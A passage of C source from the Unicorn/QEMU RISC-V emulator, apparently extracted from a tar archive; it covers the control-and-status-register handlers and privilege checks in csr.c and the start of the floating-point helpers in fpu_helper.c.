{ any, read_zero }, [CSR_MHPMCOUNTER27H] = { any, read_zero }, [CSR_MHPMCOUNTER28H] = { any, read_zero }, [CSR_MHPMCOUNTER29H] = { any, read_zero }, [CSR_MHPMCOUNTER30H] = { any, read_zero }, [CSR_MHPMCOUNTER31H] = { any, read_zero }, #endif }; /* CSR function table public API */ void riscv_get_csr_ops(int csrno, riscv_csr_operations *ops) { *ops = csr_ops[csrno & (CSR_TABLE_SIZE - 1)]; } void riscv_set_csr_ops(int csrno, riscv_csr_operations *ops) { csr_ops[csrno & (CSR_TABLE_SIZE - 1)] = *ops; } /* Predicates */ static int fs(CPURISCVState *env, int csrno) { if (!env->debugger && !riscv_cpu_fp_enabled(env)) { return -1; } return 0; } static int ctr(CPURISCVState *env, int csrno) { CPUState *cs = env_cpu(env); RISCVCPU *cpu = RISCV_CPU(cs); uint32_t ctr_en = ~0u; if (!cpu->cfg.ext_counters) { /* The Counters extensions is not enabled */ return -1; } /* * The counters are always enabled at run time on newer priv specs, as the * CSR has changed from controlling that the counters can be read to * controlling that the counters increment. */ if (env->priv_ver > PRIV_VERSION_1_09_1) { return 0; } if (env->priv < PRV_M) { ctr_en &= env->mcounteren; } if (env->priv < PRV_S) { ctr_en &= env->scounteren; } if (!(ctr_en & (1u << (csrno & 31)))) { return -1; } return 0; } static int any(CPURISCVState *env, int csrno) { return 0; } static int smode(CPURISCVState *env, int csrno) { return -!riscv_has_ext(env, RVS); } static int hmode(CPURISCVState *env, int csrno) { if (riscv_has_ext(env, RVS) && riscv_has_ext(env, RVH)) { /* Hypervisor extension is supported */ if ((env->priv == PRV_S && !riscv_cpu_virt_enabled(env)) || env->priv == PRV_M) { return 0; } } return -1; } static int pmp(CPURISCVState *env, int csrno) { return -!riscv_feature(env, RISCV_FEATURE_PMP); } /* User Floating-Point CSRs */ static int read_fflags(CPURISCVState *env, int csrno, target_ulong *val) { if (!env->debugger && !riscv_cpu_fp_enabled(env)) { return -1; } *val = riscv_cpu_get_fflags(env); return 0; } static int write_fflags(CPURISCVState *env, int csrno, target_ulong val) { if (!env->debugger && !riscv_cpu_fp_enabled(env)) { return -1; } env->mstatus |= MSTATUS_FS; riscv_cpu_set_fflags(env, val & (FSR_AEXC >> FSR_AEXC_SHIFT)); return 0; } static int read_frm(CPURISCVState *env, int csrno, target_ulong *val) { if (!env->debugger && !riscv_cpu_fp_enabled(env)) { return -1; } *val = env->frm; return 0; } static int write_frm(CPURISCVState *env, int csrno, target_ulong val) { if (!env->debugger && !riscv_cpu_fp_enabled(env)) { return -1; } env->mstatus |= MSTATUS_FS; env->frm = val & (FSR_RD >> FSR_RD_SHIFT); return 0; } static int read_fcsr(CPURISCVState *env, int csrno, target_ulong *val) { if (!env->debugger && !riscv_cpu_fp_enabled(env)) { return -1; } *val = (riscv_cpu_get_fflags(env) << FSR_AEXC_SHIFT) | (env->frm << FSR_RD_SHIFT); return 0; } static int write_fcsr(CPURISCVState *env, int csrno, target_ulong val) { if (!env->debugger && !riscv_cpu_fp_enabled(env)) { return -1; } env->mstatus |= MSTATUS_FS; env->frm = (val & FSR_RD) >> FSR_RD_SHIFT; riscv_cpu_set_fflags(env, (val & FSR_AEXC) >> FSR_AEXC_SHIFT); return 0; } /* User Timers and Counters */ static int read_instret(CPURISCVState *env, int csrno, target_ulong *val) { *val = cpu_get_host_ticks(); return 0; } #if defined(TARGET_RISCV32) static int read_instreth(CPURISCVState *env, int csrno, target_ulong *val) { *val = cpu_get_host_ticks() >> 32; return 0; } #endif /* TARGET_RISCV32 */ static int read_time(CPURISCVState *env, int csrno, target_ulong *val) { uint64_t delta = riscv_cpu_virt_enabled(env) ? env->htimedelta : 0; if (!env->rdtime_fn) { return -1; } *val = env->rdtime_fn() + delta; return 0; } #if defined(TARGET_RISCV32) static int read_timeh(CPURISCVState *env, int csrno, target_ulong *val) { uint64_t delta = riscv_cpu_virt_enabled(env) ? env->htimedelta : 0; if (!env->rdtime_fn) { return -1; } *val = (env->rdtime_fn() + delta) >> 32; return 0; } #endif /* Machine constants */ #define M_MODE_INTERRUPTS (MIP_MSIP | MIP_MTIP | MIP_MEIP) #define S_MODE_INTERRUPTS (MIP_SSIP | MIP_STIP | MIP_SEIP) #define VS_MODE_INTERRUPTS (MIP_VSSIP | MIP_VSTIP | MIP_VSEIP) static const target_ulong delegable_ints = S_MODE_INTERRUPTS | VS_MODE_INTERRUPTS; static const target_ulong all_ints = M_MODE_INTERRUPTS | S_MODE_INTERRUPTS | VS_MODE_INTERRUPTS; static const target_ulong delegable_excps = (1ULL << (RISCV_EXCP_INST_ADDR_MIS)) | (1ULL << (RISCV_EXCP_INST_ACCESS_FAULT)) | (1ULL << (RISCV_EXCP_ILLEGAL_INST)) | (1ULL << (RISCV_EXCP_BREAKPOINT)) | (1ULL << (RISCV_EXCP_LOAD_ADDR_MIS)) | (1ULL << (RISCV_EXCP_LOAD_ACCESS_FAULT)) | (1ULL << (RISCV_EXCP_STORE_AMO_ADDR_MIS)) | (1ULL << (RISCV_EXCP_STORE_AMO_ACCESS_FAULT)) | (1ULL << (RISCV_EXCP_U_ECALL)) | (1ULL << (RISCV_EXCP_S_ECALL)) | (1ULL << (RISCV_EXCP_VS_ECALL)) | (1ULL << (RISCV_EXCP_M_ECALL)) | (1ULL << (RISCV_EXCP_INST_PAGE_FAULT)) | (1ULL << (RISCV_EXCP_LOAD_PAGE_FAULT)) | (1ULL << (RISCV_EXCP_STORE_PAGE_FAULT)) | (1ULL << (RISCV_EXCP_INST_GUEST_PAGE_FAULT)) | (1ULL << (RISCV_EXCP_LOAD_GUEST_ACCESS_FAULT)) | (1ULL << (RISCV_EXCP_STORE_GUEST_AMO_ACCESS_FAULT)); static const target_ulong sstatus_v1_9_mask = SSTATUS_SIE | SSTATUS_SPIE | SSTATUS_UIE | SSTATUS_UPIE | SSTATUS_SPP | SSTATUS_FS | SSTATUS_XS | SSTATUS_SUM | SSTATUS_SD; static const target_ulong sstatus_v1_10_mask = SSTATUS_SIE | SSTATUS_SPIE | SSTATUS_UIE | SSTATUS_UPIE | SSTATUS_SPP | SSTATUS_FS | SSTATUS_XS | SSTATUS_SUM | SSTATUS_MXR | SSTATUS_SD; static const target_ulong sip_writable_mask = SIP_SSIP | MIP_USIP | MIP_UEIP; static const target_ulong hip_writable_mask = MIP_VSSIP | MIP_VSTIP | MIP_VSEIP; static const target_ulong vsip_writable_mask = MIP_VSSIP; #if defined(TARGET_RISCV32) static const char valid_vm_1_09[16] = { [VM_1_09_MBARE] = 1, [VM_1_09_SV32] = 1, }; static const char valid_vm_1_10[16] = { [VM_1_10_MBARE] = 1, [VM_1_10_SV32] = 1 }; #elif defined(TARGET_RISCV64) static const char valid_vm_1_09[16] = { [VM_1_09_MBARE] = 1, [VM_1_09_SV39] = 1, [VM_1_09_SV48] = 1, }; static const char valid_vm_1_10[16] = { [VM_1_10_MBARE] = 1, [VM_1_10_SV39] = 1, [VM_1_10_SV48] = 1, [VM_1_10_SV57] = 1 }; #endif /* Machine Information Registers */ static int read_zero(CPURISCVState *env, int csrno, target_ulong *val) { return *val = 0; } static int read_mhartid(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->mhartid; return 0; } /* Machine Trap Setup */ static int read_mstatus(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->mstatus; return 0; } static int validate_vm(CPURISCVState *env, target_ulong vm) { return (env->priv_ver >= PRIV_VERSION_1_10_0) ? valid_vm_1_10[vm & 0xf] : valid_vm_1_09[vm & 0xf]; } static int write_mstatus(CPURISCVState *env, int csrno, target_ulong val) { target_ulong mstatus = env->mstatus; target_ulong mask = 0; int dirty; /* flush tlb on mstatus fields that affect VM */ if (env->priv_ver <= PRIV_VERSION_1_09_1) { if ((val ^ mstatus) & (MSTATUS_MXR | MSTATUS_MPP | MSTATUS_MPRV | MSTATUS_SUM | MSTATUS_VM)) { tlb_flush(env_cpu(env)); } mask = MSTATUS_SIE | MSTATUS_SPIE | MSTATUS_MIE | MSTATUS_MPIE | MSTATUS_SPP | MSTATUS_FS | MSTATUS_MPRV | MSTATUS_SUM | MSTATUS_MPP | MSTATUS_MXR | (validate_vm(env, get_field(val, MSTATUS_VM)) ? MSTATUS_VM : 0); } if (env->priv_ver >= PRIV_VERSION_1_10_0) { if ((val ^ mstatus) & (MSTATUS_MXR | MSTATUS_MPP | MSTATUS_MPV | MSTATUS_MPRV | MSTATUS_SUM)) { tlb_flush(env_cpu(env)); } mask = MSTATUS_SIE | MSTATUS_SPIE | MSTATUS_MIE | MSTATUS_MPIE | MSTATUS_SPP | MSTATUS_FS | MSTATUS_MPRV | MSTATUS_SUM | MSTATUS_MPP | MSTATUS_MXR | MSTATUS_TVM | MSTATUS_TSR | MSTATUS_TW; #if defined(TARGET_RISCV64) /* * RV32: MPV and MTL are not in mstatus. The current plan is to * add them to mstatush. For now, we just don't support it. */ mask |= MSTATUS_MTL | MSTATUS_MPV; #endif } mstatus = (mstatus & ~mask) | (val & mask); dirty = ((mstatus & MSTATUS_FS) == MSTATUS_FS) | ((mstatus & MSTATUS_XS) == MSTATUS_XS); mstatus = set_field(mstatus, MSTATUS_SD, dirty); env->mstatus = mstatus; return 0; } #ifdef TARGET_RISCV32 static int read_mstatush(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->mstatush; return 0; } static int write_mstatush(CPURISCVState *env, int csrno, target_ulong val) { if ((val ^ env->mstatush) & (MSTATUS_MPV)) { tlb_flush(env_cpu(env)); } val &= MSTATUS_MPV | MSTATUS_MTL; env->mstatush = val; return 0; } #endif static int read_misa(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->misa; return 0; } static int write_misa(CPURISCVState *env, int csrno, target_ulong val) { if (!riscv_feature(env, RISCV_FEATURE_MISA)) { /* drop write to misa */ return 0; } /* 'I' or 'E' must be present */ if (!(val & (RVI | RVE))) { /* It is not, drop write to misa */ return 0; } /* 'E' excludes all other extensions */ if (val & RVE) { /* when we support 'E' we can do "val = RVE;" however * for now we just drop writes if 'E' is present. */ return 0; } /* Mask extensions that are not supported by this hart */ val &= env->misa_mask; /* Mask extensions that are not supported by QEMU */ val &= (RVI | RVE | RVM | RVA | RVF | RVD | RVC | RVS | RVU); /* 'D' depends on 'F', so clear 'D' if 'F' is not present */ if ((val & RVD) && !(val & RVF)) { val &= ~RVD; } /* Suppress 'C' if next instruction is not aligned * TODO: this should check next_pc */ if ((val & RVC) && (GETPC() & ~3) != 0) { val &= ~RVC; } /* misa.MXL writes are not supported by QEMU */ val = (env->misa & MISA_MXL) | (val & ~MISA_MXL); /* flush translation cache */ if (val != env->misa) { tb_flush(env_cpu(env)); } env->misa = val; return 0; } static int read_medeleg(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->medeleg; return 0; } static int write_medeleg(CPURISCVState *env, int csrno, target_ulong val) { env->medeleg = (env->medeleg & ~delegable_excps) | (val & delegable_excps); return 0; } static int read_mideleg(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->mideleg; return 0; } static int write_mideleg(CPURISCVState *env, int csrno, target_ulong val) { env->mideleg = (env->mideleg & ~delegable_ints) | (val & delegable_ints); if (riscv_has_ext(env, RVH)) { env->mideleg |= VS_MODE_INTERRUPTS; } return 0; } static int read_mie(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->mie; return 0; } static int write_mie(CPURISCVState *env, int csrno, target_ulong val) { env->mie = (env->mie & ~all_ints) | (val & all_ints); return 0; } static int read_mtvec(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->mtvec; return 0; } static int write_mtvec(CPURISCVState *env, int csrno, target_ulong val) { /* bits [1:0] encode mode; 0 = direct, 1 = vectored, 2 >= reserved */ if ((val & 3) < 2) { env->mtvec = val; } else { qemu_log_mask(LOG_UNIMP, "CSR_MTVEC: reserved mode not supported\n"); } return 0; } static int read_mcounteren(CPURISCVState *env, int csrno, target_ulong *val) { if (env->priv_ver < PRIV_VERSION_1_10_0) { return -1; } *val = env->mcounteren; return 0; } static int write_mcounteren(CPURISCVState *env, int csrno, target_ulong val) { if (env->priv_ver < PRIV_VERSION_1_10_0) { return -1; } env->mcounteren = val; return 0; } /* This regiser is replaced with CSR_MCOUNTINHIBIT in 1.11.0 */ static int read_mscounteren(CPURISCVState *env, int csrno, target_ulong *val) { if (env->priv_ver > PRIV_VERSION_1_09_1 && env->priv_ver < PRIV_VERSION_1_11_0) { return -1; } *val = env->mcounteren; return 0; } /* This regiser is replaced with CSR_MCOUNTINHIBIT in 1.11.0 */ static int write_mscounteren(CPURISCVState *env, int csrno, target_ulong val) { if (env->priv_ver > PRIV_VERSION_1_09_1 && env->priv_ver < PRIV_VERSION_1_11_0) { return -1; } env->mcounteren = val; return 0; } static int read_mucounteren(CPURISCVState *env, int csrno, target_ulong *val) { if (env->priv_ver > PRIV_VERSION_1_09_1) { return -1; } *val = env->scounteren; return 0; } static int write_mucounteren(CPURISCVState *env, int csrno, target_ulong val) { if (env->priv_ver > PRIV_VERSION_1_09_1) { return -1; } env->scounteren = val; return 0; } /* Machine Trap Handling */ static int read_mscratch(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->mscratch; return 0; } static int write_mscratch(CPURISCVState *env, int csrno, target_ulong val) { env->mscratch = val; return 0; } static int read_mepc(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->mepc; return 0; } static int write_mepc(CPURISCVState *env, int csrno, target_ulong val) { env->mepc = val; return 0; } static int read_mcause(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->mcause; return 0; } static int write_mcause(CPURISCVState *env, int csrno, target_ulong val) { env->mcause = val; return 0; } static int read_mbadaddr(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->mbadaddr; return 0; } static int write_mbadaddr(CPURISCVState *env, int csrno, target_ulong val) { env->mbadaddr = val; return 0; } static int rmw_mip(CPURISCVState *env, int csrno, target_ulong *ret_value, target_ulong new_value, target_ulong write_mask) { RISCVCPU *cpu = env_archcpu(env); /* Allow software control of delegable interrupts not claimed by hardware */ target_ulong mask = write_mask & delegable_ints & ~env->miclaim; uint32_t old_mip; if (mask) { old_mip = riscv_cpu_update_mip(cpu, mask, (new_value & mask)); } else { old_mip = env->mip; } if (ret_value) { *ret_value = old_mip; } return 0; } /* Supervisor Trap Setup */ static int read_sstatus(CPURISCVState *env, int csrno, target_ulong *val) { target_ulong mask = ((env->priv_ver >= PRIV_VERSION_1_10_0) ? sstatus_v1_10_mask : sstatus_v1_9_mask); *val = env->mstatus & mask; return 0; } static int write_sstatus(CPURISCVState *env, int csrno, target_ulong val) { target_ulong mask = ((env->priv_ver >= PRIV_VERSION_1_10_0) ? sstatus_v1_10_mask : sstatus_v1_9_mask); target_ulong newval = (env->mstatus & ~mask) | (val & mask); return write_mstatus(env, CSR_MSTATUS, newval); } static int read_sie(CPURISCVState *env, int csrno, target_ulong *val) { if (riscv_cpu_virt_enabled(env)) { /* Tell the guest the VS bits, shifted to the S bit locations */ *val = (env->mie & env->mideleg & VS_MODE_INTERRUPTS) >> 1; } else { *val = env->mie & env->mideleg; } return 0; } static int write_sie(CPURISCVState *env, int csrno, target_ulong val) { target_ulong newval; if (riscv_cpu_virt_enabled(env)) { /* Shift the guests S bits to VS */ newval = (env->mie & ~VS_MODE_INTERRUPTS) | ((val << 1) & VS_MODE_INTERRUPTS); } else { newval = (env->mie & ~S_MODE_INTERRUPTS) | (val & S_MODE_INTERRUPTS); } return write_mie(env, CSR_MIE, newval); } static int read_stvec(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->stvec; return 0; } static int write_stvec(CPURISCVState *env, int csrno, target_ulong val) { /* bits [1:0] encode mode; 0 = direct, 1 = vectored, 2 >= reserved */ if ((val & 3) < 2) { env->stvec = val; } else { qemu_log_mask(LOG_UNIMP, "CSR_STVEC: reserved mode not supported\n"); } return 0; } static int read_scounteren(CPURISCVState *env, int csrno, target_ulong *val) { if (env->priv_ver < PRIV_VERSION_1_10_0) { return -1; } *val = env->scounteren; return 0; } static int write_scounteren(CPURISCVState *env, int csrno, target_ulong val) { if (env->priv_ver < PRIV_VERSION_1_10_0) { return -1; } env->scounteren = val; return 0; } /* Supervisor Trap Handling */ static int read_sscratch(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->sscratch; return 0; } static int write_sscratch(CPURISCVState *env, int csrno, target_ulong val) { env->sscratch = val; return 0; } static int read_sepc(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->sepc; return 0; } static int write_sepc(CPURISCVState *env, int csrno, target_ulong val) { env->sepc = val; return 0; } static int read_scause(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->scause; return 0; } static int write_scause(CPURISCVState *env, int csrno, target_ulong val) { env->scause = val; return 0; } static int read_sbadaddr(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->sbadaddr; return 0; } static int write_sbadaddr(CPURISCVState *env, int csrno, target_ulong val) { env->sbadaddr = val; return 0; } static int rmw_sip(CPURISCVState *env, int csrno, target_ulong *ret_value, target_ulong new_value, target_ulong write_mask) { int ret; if (riscv_cpu_virt_enabled(env)) { /* Shift the new values to line up with the VS bits */ ret = rmw_mip(env, CSR_MSTATUS, ret_value, new_value << 1, (write_mask & sip_writable_mask) << 1 & env->mideleg); ret &= vsip_writable_mask; ret >>= 1; } else { ret = rmw_mip(env, CSR_MSTATUS, ret_value, new_value, write_mask & env->mideleg & sip_writable_mask); } *ret_value &= env->mideleg; return ret; } /* Supervisor Protection and Translation */ static int read_satp(CPURISCVState *env, int csrno, target_ulong *val) { if (!riscv_feature(env, RISCV_FEATURE_MMU)) { *val = 0; } else if (env->priv_ver >= PRIV_VERSION_1_10_0) { if (env->priv == PRV_S && get_field(env->mstatus, MSTATUS_TVM)) { return -1; } else { *val = env->satp; } } else { *val = env->sptbr; } return 0; } static int write_satp(CPURISCVState *env, int csrno, target_ulong val) { if (!riscv_feature(env, RISCV_FEATURE_MMU)) { return 0; } if (env->priv_ver <= PRIV_VERSION_1_09_1 && (val ^ env->sptbr)) { tlb_flush(env_cpu(env)); env->sptbr = val & (((target_ulong) 1 << (TARGET_PHYS_ADDR_SPACE_BITS - PGSHIFT)) - 1); } if (env->priv_ver >= PRIV_VERSION_1_10_0 && validate_vm(env, get_field(val, SATP_MODE)) && ((val ^ env->satp) & (SATP_MODE | SATP_ASID | SATP_PPN))) { if (env->priv == PRV_S && get_field(env->mstatus, MSTATUS_TVM)) { return -1; } else { if((val ^ env->satp) & SATP_ASID) { tlb_flush(env_cpu(env)); } env->satp = val; } } return 0; } /* Hypervisor Extensions */ static int read_hstatus(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->hstatus; return 0; } static int write_hstatus(CPURISCVState *env, int csrno, target_ulong val) { env->hstatus = val; return 0; } static int read_hedeleg(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->hedeleg; return 0; } static int write_hedeleg(CPURISCVState *env, int csrno, target_ulong val) { env->hedeleg = val; return 0; } static int read_hideleg(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->hideleg; return 0; } static int write_hideleg(CPURISCVState *env, int csrno, target_ulong val) { env->hideleg = val; return 0; } static int rmw_hip(CPURISCVState *env, int csrno, target_ulong *ret_value, target_ulong new_value, target_ulong write_mask) { int ret = rmw_mip(env, 0, ret_value, new_value, write_mask & hip_writable_mask); return ret; } static int read_hie(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->mie & VS_MODE_INTERRUPTS; return 0; } static int write_hie(CPURISCVState *env, int csrno, target_ulong val) { target_ulong newval = (env->mie & ~VS_MODE_INTERRUPTS) | (val & VS_MODE_INTERRUPTS); return write_mie(env, CSR_MIE, newval); } static int read_hcounteren(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->hcounteren; return 0; } static int write_hcounteren(CPURISCVState *env, int csrno, target_ulong val) { env->hcounteren = val; return 0; } static int read_htval(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->htval; return 0; } static int write_htval(CPURISCVState *env, int csrno, target_ulong val) { env->htval = val; return 0; } static int read_htinst(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->htinst; return 0; } static int write_htinst(CPURISCVState *env, int csrno, target_ulong val) { env->htinst = val; return 0; } static int read_hgatp(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->hgatp; return 0; } static int write_hgatp(CPURISCVState *env, int csrno, target_ulong val) { env->hgatp = val; return 0; } static int read_htimedelta(CPURISCVState *env, int csrno, target_ulong *val) { if (!env->rdtime_fn) { return -1; } #if defined(TARGET_RISCV32) *val = env->htimedelta & 0xffffffff; #else *val = env->htimedelta; #endif return 0; } static int write_htimedelta(CPURISCVState *env, int csrno, target_ulong val) { if (!env->rdtime_fn) { return -1; } #if defined(TARGET_RISCV32) env->htimedelta = deposit64(env->htimedelta, 0, 32, (uint64_t)val); #else env->htimedelta = val; #endif return 0; } #if defined(TARGET_RISCV32) static int read_htimedeltah(CPURISCVState *env, int csrno, target_ulong *val) { if (!env->rdtime_fn) { return -1; } *val = env->htimedelta >> 32; return 0; } static int write_htimedeltah(CPURISCVState *env, int csrno, target_ulong val) { if (!env->rdtime_fn) { return -1; } env->htimedelta = deposit64(env->htimedelta, 32, 32, (uint64_t)val); return 0; } #endif /* Virtual CSR Registers */ static int read_vsstatus(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->vsstatus; return 0; } static int write_vsstatus(CPURISCVState *env, int csrno, target_ulong val) { env->vsstatus = val; return 0; } static int rmw_vsip(CPURISCVState *env, int csrno, target_ulong *ret_value, target_ulong new_value, target_ulong write_mask) { int ret = rmw_mip(env, 0, ret_value, new_value, write_mask & env->mideleg & vsip_writable_mask); return ret; } static int read_vsie(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->mie & env->mideleg & VS_MODE_INTERRUPTS; return 0; } static int write_vsie(CPURISCVState *env, int csrno, target_ulong val) { target_ulong newval = (env->mie & ~env->mideleg) | (val & env->mideleg & MIP_VSSIP); return write_mie(env, CSR_MIE, newval); } static int read_vstvec(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->vstvec; return 0; } static int write_vstvec(CPURISCVState *env, int csrno, target_ulong val) { env->vstvec = val; return 0; } static int read_vsscratch(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->vsscratch; return 0; } static int write_vsscratch(CPURISCVState *env, int csrno, target_ulong val) { env->vsscratch = val; return 0; } static int read_vsepc(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->vsepc; return 0; } static int write_vsepc(CPURISCVState *env, int csrno, target_ulong val) { env->vsepc = val; return 0; } static int read_vscause(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->vscause; return 0; } static int write_vscause(CPURISCVState *env, int csrno, target_ulong val) { env->vscause = val; return 0; } static int read_vstval(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->vstval; return 0; } static int write_vstval(CPURISCVState *env, int csrno, target_ulong val) { env->vstval = val; return 0; } static int read_vsatp(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->vsatp; return 0; } static int write_vsatp(CPURISCVState *env, int csrno, target_ulong val) { env->vsatp = val; return 0; } static int read_mtval2(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->mtval2; return 0; } static int write_mtval2(CPURISCVState *env, int csrno, target_ulong val) { env->mtval2 = val; return 0; } static int read_mtinst(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->mtinst; return 0; } static int write_mtinst(CPURISCVState *env, int csrno, target_ulong val) { env->mtinst = val; return 0; } /* Physical Memory Protection */ static int read_pmpcfg(CPURISCVState *env, int csrno, target_ulong *val) { *val = pmpcfg_csr_read(env, csrno - CSR_PMPCFG0); return 0; } static int write_pmpcfg(CPURISCVState *env, int csrno, target_ulong val) { pmpcfg_csr_write(env, csrno - CSR_PMPCFG0, val); return 0; } static int read_pmpaddr(CPURISCVState *env, int csrno, target_ulong *val) { *val = pmpaddr_csr_read(env, csrno - CSR_PMPADDR0); return 0; } static int write_pmpaddr(CPURISCVState *env, int csrno, target_ulong val) { pmpaddr_csr_write(env, csrno - CSR_PMPADDR0, val); return 0; } /* * riscv_csrrw - read and/or update control and status register * * csrr <-> riscv_csrrw(env, csrno, ret_value, 0, 0); * csrrw <-> riscv_csrrw(env, csrno, ret_value, value, -1); * csrrs <-> riscv_csrrw(env, csrno, ret_value, -1, value); * csrrc <-> riscv_csrrw(env, csrno, ret_value, 0, value); */ int riscv_csrrw(CPURISCVState *env, int csrno, target_ulong *ret_value, target_ulong new_value, target_ulong write_mask) { int ret; target_ulong old_value; RISCVCPU *cpu = env_archcpu(env); /* check privileges and return -1 if check fails */ int effective_priv = env->priv; int read_only = get_field(csrno, 0xC00) == 3; if (riscv_has_ext(env, RVH) && env->priv == PRV_S && !riscv_cpu_virt_enabled(env)) { /* * We are in S mode without virtualisation, therefore we are in HS Mode. * Add 1 to the effective privledge level to allow us to access the * Hypervisor CSRs. */ effective_priv++; } if ((write_mask && read_only) || (!env->debugger && (effective_priv < get_field(csrno, 0x300)))) { return -1; } /* ensure the CSR extension is enabled. */ if (!cpu->cfg.ext_icsr) { return -1; } /* check predicate */ if (!csr_ops[csrno].predicate || csr_ops[csrno].predicate(env, csrno) < 0) { return -1; } /* execute combined read/write operation if it exists */ if (csr_ops[csrno].op) { return csr_ops[csrno].op(env, csrno, ret_value, new_value, write_mask); } /* if no accessor exists then return failure */ if (!csr_ops[csrno].read) { return -1; } /* read old value */ ret = csr_ops[csrno].read(env, csrno, &old_value); if (ret < 0) { return ret; } /* write value if writable and write mask set, otherwise drop writes */ if (write_mask) { new_value = (old_value & ~write_mask) | (new_value & write_mask); if (csr_ops[csrno].write) { ret = csr_ops[csrno].write(env, csrno, new_value); if (ret < 0) { return ret; } } } /* return old value */ if (ret_value) { *ret_value = old_value; } return 0; } /* * Debugger support. If not in user mode, set env->debugger before the * riscv_csrrw call and clear it after the call. */ int riscv_csrrw_debug(CPURISCVState *env, int csrno, target_ulong *ret_value, target_ulong new_value, target_ulong write_mask) { int ret; env->debugger = true; ret = riscv_csrrw(env, csrno, ret_value, new_value, write_mask); env->debugger = false; return ret; } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/fpu_helper.c��������������������������������������������������������0000664�0000000�0000000�00000024044�14675241067�0021070�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * RISC-V FPU Emulation Helpers for QEMU. * * Copyright (c) 2016-2017 Sagar Karandikar, sagark@eecs.berkeley.edu * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, * version 2 or later, as published by the Free Software Foundation. * * This program is distributed in the hope it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program. If not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "qemu/host-utils.h" #include "exec/exec-all.h" #include "exec/helper-proto.h" #include "fpu/softfloat.h" target_ulong riscv_cpu_get_fflags(CPURISCVState *env) { int soft = get_float_exception_flags(&env->fp_status); target_ulong hard = 0; hard |= (soft & float_flag_inexact) ? FPEXC_NX : 0; hard |= (soft & float_flag_underflow) ? FPEXC_UF : 0; hard |= (soft & float_flag_overflow) ? FPEXC_OF : 0; hard |= (soft & float_flag_divbyzero) ? FPEXC_DZ : 0; hard |= (soft & float_flag_invalid) ? FPEXC_NV : 0; return hard; } void riscv_cpu_set_fflags(CPURISCVState *env, target_ulong hard) { int soft = 0; soft |= (hard & FPEXC_NX) ? float_flag_inexact : 0; soft |= (hard & FPEXC_UF) ? float_flag_underflow : 0; soft |= (hard & FPEXC_OF) ? float_flag_overflow : 0; soft |= (hard & FPEXC_DZ) ? float_flag_divbyzero : 0; soft |= (hard & FPEXC_NV) ? float_flag_invalid : 0; set_float_exception_flags(soft, &env->fp_status); } void helper_set_rounding_mode(CPURISCVState *env, uint32_t rm) { int softrm; if (rm == 7) { rm = env->frm; } switch (rm) { case 0: softrm = float_round_nearest_even; break; case 1: softrm = float_round_to_zero; break; case 2: softrm = float_round_down; break; case 3: softrm = float_round_up; break; case 4: softrm = float_round_ties_away; break; default: riscv_raise_exception(env, RISCV_EXCP_ILLEGAL_INST, GETPC()); } set_float_rounding_mode(softrm, &env->fp_status); } uint64_t helper_fmadd_s(CPURISCVState *env, uint64_t frs1, uint64_t frs2, uint64_t frs3) { return float32_muladd(frs1, frs2, frs3, 0, &env->fp_status); } uint64_t helper_fmadd_d(CPURISCVState *env, uint64_t frs1, uint64_t frs2, uint64_t frs3) { return float64_muladd(frs1, frs2, frs3, 0, &env->fp_status); } uint64_t helper_fmsub_s(CPURISCVState *env, uint64_t frs1, uint64_t frs2, uint64_t frs3) { return float32_muladd(frs1, frs2, frs3, float_muladd_negate_c, &env->fp_status); } uint64_t helper_fmsub_d(CPURISCVState *env, uint64_t frs1, uint64_t frs2, uint64_t frs3) { return float64_muladd(frs1, frs2, frs3, float_muladd_negate_c, &env->fp_status); } uint64_t helper_fnmsub_s(CPURISCVState *env, uint64_t frs1, uint64_t frs2, uint64_t frs3) { return float32_muladd(frs1, frs2, frs3, float_muladd_negate_product, &env->fp_status); } uint64_t helper_fnmsub_d(CPURISCVState *env, uint64_t frs1, uint64_t frs2, uint64_t frs3) { return float64_muladd(frs1, frs2, frs3, float_muladd_negate_product, &env->fp_status); } uint64_t helper_fnmadd_s(CPURISCVState *env, uint64_t frs1, uint64_t frs2, uint64_t frs3) { return float32_muladd(frs1, frs2, frs3, float_muladd_negate_c | float_muladd_negate_product, &env->fp_status); } uint64_t 